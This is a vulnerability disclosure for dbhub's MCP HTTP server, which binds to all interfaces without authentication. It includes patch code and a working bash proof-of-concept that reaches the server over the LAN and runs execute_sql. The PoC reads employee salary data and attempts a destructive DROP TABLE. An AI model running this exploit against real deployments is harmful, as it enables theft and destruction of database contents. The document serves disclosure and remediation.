Unauthenticated Server Bound to All Network Interfaces

[Koukyosyumei]

Summary

The Express HTTP server is unconditionally started on the wildcard address '0.0.0.0', binding to every network interface, and no authentication middleware is registered on any route:

// src/server.ts:233
app.listen(port, '0.0.0.0', () => {  // ← binds to ALL interfaces
    console.error(`MCP server endpoint at http://localhost:${port}/mcp`);
});

No API key, Bearer token, or any other credential check exists anywhere in the middleware chain. Any TCP connection reaching the port — whether from loopback, LAN, VPN, or a Docker bridge — is served as a fully privileged MCP client.

Related | CVE-2026-23744 (MCPJam Inspector — 0.0.0.0 bind + no auth)

Scenario

1. Developer starts dbhub --transport=http --dsn="postgres://..." on a
   workstation connected to a shared office network.
2. Any other machine on the same subnet sends a single HTTP POST to
   http://<developer-LAN-IP>:8080/mcp with a JSON-RPC initialize request —
   no credentials required.
3. After the handshake, the attacker calls execute_sql to dump, modify, or
   delete data in the connected database:

Patch Idea

Step 1 — Bind to loopback only unless the operator explicitly overrides:

// src/config/env.ts — add bind address resolution
export function resolveBindAddress(): string {
    return process.env.DBHUB_BIND_ADDRESS ?? '127.0.0.1';
}

// src/server.ts — replace '0.0.0.0' with the resolved address
const bindAddress = resolveBindAddress();
app.listen(port, bindAddress, () => { ... });

Step 2 — Add token-based authentication for production use:

// src/server.ts — add before all routes
const API_TOKEN = process.env.DBHUB_API_TOKEN;
if (API_TOKEN) {
    app.use('/mcp', (req, res, next) => {
        const auth = req.headers.authorization ?? '';
        if (auth !== `Bearer ${API_TOKEN}`) {
            return res.status(401).json({ error: 'Unauthorized' });
        }
        next();
    });
}

[Koukyosyumei]

Let me also share the executable PoC script:

#!/usr/bin/env bash
# =============================================================================
# PoC F-02 — Unauthenticated Server Bound to All Network Interfaces
# Target  : dbhub v0.21.1  (src/server.ts)
# Finding : AUTH-BIND (High) — CVE-2026-23744
# CVSS    : 8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
#
# What this PoC proves
# --------------------
# dbhub starts its Express HTTP server on 0.0.0.0 (all interfaces) with no
# authentication middleware.  Any machine on the same network can send
# unauthenticated MCP calls and execute arbitrary SQL against the connected
# database — full confidentiality, integrity, and availability impact.
#
# This script:
#   1. Detects the host's non-loopback (LAN) IP address using the same UDP
#      routing trick used by weird-agent's AUTH-BIND check.
#   2. Sends an MCP initialize handshake to <LAN-IP>:<PORT> (bypassing
#      localhost entirely — simulating a request from a different machine).
#   3. On success, executes a SELECT and a destructive DROP TABLE to
#      demonstrate unrestricted read and write access.
#
# Usage
# -----
#   # 1. Start dbhub in HTTP mode
#   cd /path/to/dbhub
#   npx tsx src/index.ts --transport=http --demo --port=18765 &
#   sleep 3
#
#   # 2. Run this script
#   bash poc_f02_auth_bind.sh [PORT]   # default port: 18765
#
# Expected result
# ---------------
#   LAN IP reachable  → MCP handshake succeeds with no credentials
#   execute_sql SELECT → employee data returned
#   execute_sql DROP   → table destroyed (or error if readonly configured)
#
# Patched result
# --------------
#   After binding to 127.0.0.1, connection to LAN IP should be refused.
#   After adding Bearer auth, requests without Authorization should receive 401.
# =============================================================================

set -euo pipefail

PORT="${1:-18765}"
LOCALHOST_URL="http://localhost:${PORT}/mcp"

RED='\033[0;31m'; GREEN='\033[0;32m'; YELLOW='\033[1;33m'; NC='\033[0m'

die() { echo -e "${RED}ERROR: $*${NC}" >&2; exit 1; }
ok()  { echo -e "${GREEN}[PASS]${NC} $*"; }
bad() { echo -e "${RED}[VULN]${NC} $*"; }
info(){ echo -e "${YELLOW}[INFO]${NC} $*"; }

echo ""
echo "=== PoC F-02: Unauthenticated 0.0.0.0 Bind — dbhub v0.21.1 ==="
echo "    Localhost target : ${LOCALHOST_URL}"
echo ""

# ── Sanity: confirm the server is running ─────────────────────────────────────
info "Checking that dbhub is listening on port ${PORT}..."
if ! curl -sf -o /dev/null \
       -H "Accept: application/json, text/event-stream" \
       -H "Content-Type: application/json" \
       -d '{"jsonrpc":"2.0","id":0,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"sanity","version":"0"}}}' \
       "${LOCALHOST_URL}"; then
    die "dbhub is not reachable at ${LOCALHOST_URL}. Start it first:
  cd /path/to/dbhub && npx tsx src/index.ts --transport=http --demo --port=${PORT} &"
fi
ok "Server is up on localhost."
echo ""

# ── STEP 1: Discover the host's LAN IP ───────────────────────────────────────
echo "--- STEP 1: Detect LAN IP (non-loopback interface) ---"

# The same UDP routing trick used by weird-agent's get_lan_ip():
# opening a UDP socket toward a public IP causes the OS to select the
# outbound interface without sending any packet.
LAN_IP=$(python3 -c "
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
print(s.getsockname()[0])
s.close()
" 2>/dev/null || true)

if [ -z "${LAN_IP}" ] || [ "${LAN_IP}" = "127.0.0.1" ]; then
    die "Could not determine a non-loopback IP.  Are you connected to a network?"
fi
info "LAN IP detected: ${LAN_IP}"

LAN_URL="http://${LAN_IP}:${PORT}/mcp"
echo "    Attacker URL : ${LAN_URL}"
echo ""

# ── STEP 2: MCP initialize via LAN IP (no auth, simulated remote attacker) ───
echo "--- STEP 2: MCP initialize via LAN IP (no credentials) ---"

INIT_BODY=$(printf '{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "initialize",
  "params": {
    "protocolVersion": "2024-11-05",
    "capabilities": {},
    "clientInfo": { "name": "lan-attacker", "version": "1.0" }
  }
}')

INIT_RESP=$(curl -s -w "\n__STATUS__:%{http_code}" -X POST "${LAN_URL}" \
  -H "Content-Type: application/json" \
  -H "Accept: application/json, text/event-stream" \
  -d "${INIT_BODY}" 2>&1)

HTTP_STATUS=$(echo "${INIT_RESP}" | grep "__STATUS__:" | cut -d: -f2)
BODY=$(echo "${INIT_RESP}" | grep -v "__STATUS__:")

echo "  HTTP status : ${HTTP_STATUS}"

if [ "${HTTP_STATUS}" = "000" ]; then
    ok "Connection refused — server is NOT reachable on LAN IP."
    echo "  Server appears to be bound to 127.0.0.1 only. Exiting."
    exit 0
fi

if [ "${HTTP_STATUS}" = "401" ] || [ "${HTTP_STATUS}" = "403" ]; then
    ok "Server requires authentication (HTTP ${HTTP_STATUS}). Exiting."
    exit 0
fi

if echo "${BODY}" | grep -q "serverInfo"; then
    SERVER_NAME=$(echo "${BODY}" | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('result',{}).get('serverInfo',{}).get('name','?'))" 2>/dev/null || echo "?")
    bad "MCP handshake succeeded via LAN IP with NO credentials!"
    bad "Any machine on the local network can access this dbhub instance."
    echo "  Server: ${SERVER_NAME}"
else
    info "Unexpected response — inspect manually:"
    echo "${BODY}" | python3 -m json.tool 2>/dev/null || echo "${BODY}"
    echo ""
fi
echo ""

# ── STEP 3: Read all data (SELECT) ────────────────────────────────────────────
echo "--- STEP 3: Exfiltrate data via execute_sql (unauthenticated) ---"

SELECT_BODY=$(printf '{
  "jsonrpc": "2.0",
  "id": 2,
  "method": "tools/call",
  "params": {
    "name": "execute_sql",
    "arguments": { "sql": "SELECT name, department, salary FROM employees LIMIT 5" }
  }
}')

SELECT_RESP=$(curl -s -X POST "${LAN_URL}" \
  -H "Content-Type: application/json" \
  -H "Accept: application/json, text/event-stream" \
  -d "${SELECT_BODY}" 2>&1)

echo "  Response:"
echo "${SELECT_RESP}" | python3 -m json.tool 2>/dev/null || echo "${SELECT_RESP}"
echo ""

if echo "${SELECT_RESP}" | grep -q '"rows"'; then
    bad "SELECT returned employee data over the unauthenticated LAN connection!"
fi
echo ""

# ── STEP 4: Destructive write (DROP TABLE) ────────────────────────────────────
echo "--- STEP 4: Attempt destructive write via execute_sql ---"
info "(In demo/read-only mode this will be rejected by the readonly guard.)"
info " In a non-readonly deployment this would permanently destroy data."

DROP_BODY=$(printf '{
  "jsonrpc": "2.0",
  "id": 3,
  "method": "tools/call",
  "params": {
    "name": "execute_sql",
    "arguments": { "sql": "DROP TABLE IF EXISTS employees" }
  }
}')

DROP_RESP=$(curl -s -X POST "${LAN_URL}" \
  -H "Content-Type: application/json" \
  -H "Accept: application/json, text/event-stream" \
  -d "${DROP_BODY}" 2>&1)

echo "  Response:"
echo "${DROP_RESP}" | python3 -m json.tool 2>/dev/null || echo "${DROP_RESP}"
echo ""

if echo "${DROP_RESP}" | python3 -c "
import sys, json
d = json.load(sys.stdin)
content = d.get('result', {}).get('content', [{}])
text = content[0].get('text', '') if content else ''
is_error = d.get('result', {}).get('isError', False)
if not is_error and 'error' not in text.lower():
    print('DROPPED')
else:
    print('BLOCKED: ' + text[:120])
" 2>/dev/null | grep -q "DROPPED"; then
    bad "DROP TABLE succeeded — attacker destroyed the database table!"
else
    info "DROP was blocked (readonly mode or DB-level constraint)."
    info "However, the MCP session itself was fully accessible over LAN."
fi
echo ""

# ── STEP 5: Check for auth header enforcement ─────────────────────────────────
echo "--- STEP 5: Verify no Bearer token is required ---"

AUTH_RESP=$(curl -s -o /dev/null -w "%{http_code}" -X POST "${LAN_URL}" \
  -H "Content-Type: application/json" \
  -H "Accept: application/json, text/event-stream" \
  -H "Authorization: Bearer INVALID_TOKEN_XYZ" \
  -d "${INIT_BODY}" 2>&1)

if [ "${AUTH_RESP}" = "401" ] || [ "${AUTH_RESP}" = "403" ]; then
    ok "Server enforces Bearer token auth (HTTP ${AUTH_RESP} with invalid token)."
else
    bad "Server accepted an INVALID Bearer token with HTTP ${AUTH_RESP} — no auth enforcement."
fi
echo ""

# ── Summary ───────────────────────────────────────────────────────────────────
echo "=== Summary ==="
bad "VULNERABLE: dbhub binds to 0.0.0.0 with no authentication."
echo ""
echo "  Root cause : src/server.ts:233  app.listen(port, '0.0.0.0', ...)"
echo "               No auth middleware on any route."
echo "  Impact     : Any LAN host can read/modify/delete all connected databases."
echo ""
echo "  Fix 1 — Bind to loopback (src/config/env.ts + src/server.ts):"
echo ""
cat <<'FIX1'
  // src/config/env.ts
  export function resolveBindAddress(): string {
      return process.env.DBHUB_BIND_ADDRESS ?? '127.0.0.1';
  }

  // src/server.ts — replace '0.0.0.0'
  const bindAddress = resolveBindAddress();
  app.listen(port, bindAddress, () => { ... });
FIX1
echo ""
echo "  Fix 2 — Bearer token auth middleware (src/server.ts):"
echo ""
cat <<'FIX2'
  const API_TOKEN = process.env.DBHUB_API_TOKEN;
  if (API_TOKEN) {
      app.use('/mcp', (req, res, next) => {
          const auth = req.headers.authorization ?? '';
          if (auth !== `Bearer ${API_TOKEN}`) {
              return res.status(401).json({ error: 'Unauthorized' });
          }
          next();
      });
  }
FIX2